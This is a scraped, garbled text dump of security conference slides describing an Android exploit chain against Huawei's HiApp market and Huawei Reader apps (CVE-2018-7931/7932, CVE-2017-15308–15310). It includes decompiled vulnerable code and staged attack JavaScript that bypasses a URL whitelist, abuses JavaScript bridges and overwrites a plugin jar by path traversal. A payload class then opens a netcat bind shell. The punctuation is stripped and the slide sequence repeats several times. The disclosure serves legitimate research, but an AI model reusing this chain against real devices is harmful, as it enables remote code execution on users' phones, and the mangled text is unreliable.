Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 19: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/19.jpg)
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 20: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/20.jpg)
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 21: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/21.jpg)
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
